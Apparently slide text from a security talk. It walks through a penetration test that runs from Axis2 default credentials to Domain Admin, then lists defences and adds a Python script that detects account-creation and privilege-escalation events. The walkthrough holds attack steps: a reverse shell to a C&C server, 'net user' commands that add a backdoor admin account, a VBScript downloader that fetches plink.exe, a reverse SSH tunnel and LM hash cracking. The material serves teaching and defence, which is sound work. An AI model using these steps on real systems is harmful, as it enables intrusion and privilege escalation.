   Complexity of systems, application code, communication flows, network segmentation
   Out-of-the-box vulnerabilities of vendor solutions and lack of security configuration ("Next -> Next -> Next" syndrome)
   Lack of secure coding awareness (OWASP Top 10)
   Lack of enforcement of security during IT projects: security implies cost and time, need for functionality <-> need for security
   As a result, protections are often run in blacklist mode or left in learning mode
Penetration test example
 Context: black box intrusion test
 Scope: external-facing systems, i.e. the web servers on ports 80 (HTTP) and 443 (HTTPS)
 (Diagram of the target: DMZ hosting the web servers; Intranet / internal network hosting the enterprise Windows domain)
Penetration test example
 VULN 1 & 2: vulnerable deployment of SAP BusinessObjects (bundled Apache Axis2)
   CVE-2010-0219: Apache Axis2 default credentials
   http://www.securityfocus.com/bid/40343: Apache Axis2 directory traversal
   See earlier: the "directory traversal" and "default password" vulnerability classes
   Result: admin credentials for the Axis2 administration interface
  • 51. Penetration test example
  • Access to the Axis2 administration interface allows uploading a web service and hot-deploying it
  • 52. Penetration test example
  • A Metasploit module exists to exploit this vuln: Axis2 / SAP BusinessObjects Authenticated Code Execution
  • http://www.rapid7.com/db/modules/exploit/multi/http/axis2_deployer
  • We use it to deploy a reverse shell backdoor on the server which connects back to port 80
  • VULN 3: The server is allowed to contact any host on the Internet on ports 80 and 443
  • [Diagram: Web Servers, ports 80 (HTTP) and 443 (HTTPS), DMZ, Intranet, Enterprise Windows Domain, Internal Network; C&C SERVER on port 80, outbound connection on port 80]
  • 53. Penetration test example
  • Not possible to upload a Meterpreter (killed by the AV on the machine)
  • Possible to upload a backdoor which sends me back a DOS command prompt on the server
  • 54. Penetration test example
  • Next steps:
  • Create a privileged account on the server
  • VULN 4: The application server is running with ADMIN privileges
  • Net user temptest password /add
  • Net localgroup Administrators hacked /add
  • Obtain a Remote Desktop connection
  • Problem: port 3389 is closed inbound
  • Solution: create a reverse SSH tunnel with reverse port-forwarding on port 3389
  • [Diagram: Web Servers, C&C SERVER on port 80, port 3389, SSH SERVER on port 443, reverse SSH tunnel over port 443]
  • 55. Penetration test example
  • To create the tunnel, I need to download an SSH client onto the server using the DOS command prompt
  • I create a VBScript line by line using the "Echo" command, then execute the VBScript
  • Echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") >> dl.vbs
  • Cscript dl.vbs
  • Use plink to create the tunnel
  • Content of dl.vbs:
    dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
    dim bStrm: Set bStrm = createobject("Adodb.Stream")
    xHttp.Open "GET", "http://www.putty.com/plink.exe", False
    xHttp.Send
    with bStrm
      .type = 1 '// binary
      .open
      .write xHttp.responseBody
      .savetofile "c:\temp\plink.exe", 2 '// overwrite
    end with
  • 56. Penetration test example
  • [Diagram: Web Servers, C&C SERVER on port 80, port 3389, SSH SERVER on port 443, reverse SSH tunnel over port 443]
   Connect to RDP through the tunnel using the account I just created (temptest / password)
  • 57. Penetration test example
   Next step -> Lateral Movement, the simplest first: credentials reuse
   I need to crack all passwords present locally on the compromised server
   VULN 6/7: Windows 2003 design vulnerabilities
   VULN 6: The "Repair" folder contains a SAM backup file holding credentials stored as LM hashes
   VULN 7: The LM hash algorithm is weak and can be cracked easily
  • 58. Penetration test example
   After some minutes
  • 59. Penetration test example
   VULN 8: The local Administrator password is replicated across all systems in the DMZ
  • [Diagram: Web Servers, C&C SERVER on port 80, port 3389, SSH SERVER on port 443, reverse SSH tunnel over port 443; additional Web Servers reached over port 3389]
  • 60. Penetration test example
   Next step: try to reach the Internal Network
   VULN 9: DMZ systems are members of the internal Windows domain. This means critical ports (e.g. 139, 445, ...) must be open between the DMZ and the internal network
   VULN 10: Password replication bis. A Domain Admin account with the same name as a local account has the same password
  • 61. Penetration test example
   I connect to the Domain Controller from the DMZ using the Domain Admin account. I am now Domain Administrator and have full control over the Enterprise Domain
  • [Diagram: Web Servers, ports 80 (HTTP) and 443 (HTTPS), DMZ, Intranet, Enterprise Windows Domain, Domain Controller]
  • 63. Conclusion
   Cyber Crime will continue to be a major threat for enterprises in the coming years
   Computer vulnerabilities will continue to be discovered and will continue to affect enterprises
   Legacy technologies such as standard AV are no longer sufficient to protect against cyber threats
   Operational IT security programs must address security incident response and must address each of the following:
   Awareness
   Preventive security
   Detective security
   Corrective security
  • 64. Conclusion
   [Personal Statement] Be careful with the notion of Risk-Based Security based on asset classification
   Should less critical systems be given less attention in terms of security?
   What if a hacker can compromise a system in a non-critical zone and obtain credentials that are reused in other zones? What if the enterprise does not have one Windows domain per risk domain?
   Use Risk-Based Security only if you have full IT isolation... and even then, is that enough?
   Awareness
   Educate all your employees about emerging cyber threats
   Run real social-engineering exercises, sending undetected viruses to your employees
   Be mindful of human reactions
   Educate, but also protect colleagues who will be infected during the exercise
  • 65. Conclusion
   Preventive Security
   Sandboxing technologies must be implemented alongside standard signature-based AV to protect against APTs
   Implement NAC
   Identify your vulnerabilities before the hackers do
   Network security must be governed: network segmentation policies, firewall rules governance, flow and application control, inbound and outbound traffic policies
   High-privilege account management
   Isolation of network tiers
   Use hardening best practices
   E.g. remove admin rights from end users and from applications (least privilege)
   Implement correct Windows security settings
  • 66. Conclusion
   Detective Security
   Real-time correlation of technical use cases has real added value
   Monitor account creation on any system
   Monitor any "Domain Admin" privilege elevation
   Monitor for internal scans
   Monitor authentication failures
   Monitor denied outbound traffic
   Corrective Security
   Have emergency containment procedures defined and tested
   Have a security incident response plan
   Have a patching policy
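The detective use cases listed above, correlated over Windows Security events, as an added example that is not part of the original slides: it flags account creation on any host, a freshly created account being added to the local Administrators group (the net user / net localgroup pattern from the walkthrough), any addition to Domain Admins, and bursts of authentication failures. Event IDs are the real Windows ones; host names, account names and timestamps are constructed.

```python
"""Correlation of detective use cases over constructed Windows Security events.
Added example, not code from the slides. Event IDs are the real ones:
4720 user account created, 4732 member added to a local group, 4728 member
added to a global group (e.g. Domain Admins), 4625 logon failure.
Host names, account names and timestamps below are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: the application account on WEB01 creates a local user
# and adds it to Administrators seconds later, as in the walkthrough.
EVENTS = [
    {"time": "2015-06-01T10:00:00", "host": "WEB01", "id": 4720,
     "subject": "svc_axis2", "target": "temptest"},
    {"time": "2015-06-01T10:00:05", "host": "WEB01", "id": 4732,
     "subject": "svc_axis2", "target": "temptest", "group": "Administrators"},
    {"time": "2015-06-01T10:20:00", "host": "DC01", "id": 4728,
     "subject": "jsmith", "target": "temptest", "group": "Domain Admins"},
]
# Six failed logons against the local administrator of WEB02 within a minute.
EVENTS += [{"time": f"2015-06-01T11:00:{s:02d}", "host": "WEB02", "id": 4625,
            "subject": "-", "target": "administrator"} for s in range(6)]

def correlate(events, window=timedelta(minutes=10), fail_threshold=5):
    """Return (use_case, host, account) alerts, in event order."""
    alerts = []
    created = {}                   # (host, account) -> creation time
    failures = defaultdict(int)    # (host, account) -> failed logon count
    for e in sorted(events, key=lambda e: e["time"]):   # ISO strings sort
        t = datetime.fromisoformat(e["time"])
        key = (e["host"], e["target"])
        if e["id"] == 4720:                      # account creation on any system
            created[key] = t
            alerts.append(("ACCOUNT_CREATED", *key))
        elif e["id"] == 4732 and e.get("group") == "Administrators":
            # new account made local admin shortly after creation
            if key in created and t - created[key] <= window:
                alerts.append(("NEW_ACCOUNT_MADE_ADMIN", *key))
        elif e["id"] == 4728 and e.get("group") == "Domain Admins":
            alerts.append(("DOMAIN_ADMIN_ELEVATION", *key))
        elif e["id"] == 4625:                    # authentication failure burst
            failures[key] += 1
            if failures[key] == fail_threshold:  # alert once per burst
                alerts.append(("AUTH_FAILURE_BURST", *key))
    return alerts

if __name__ == "__main__":
    for alert in correlate(EVENTS):
        print(alert)
```

Denied outbound traffic and internal scans come from firewall logs rather than the Security event log and would be fed into the same loop as additional event kinds.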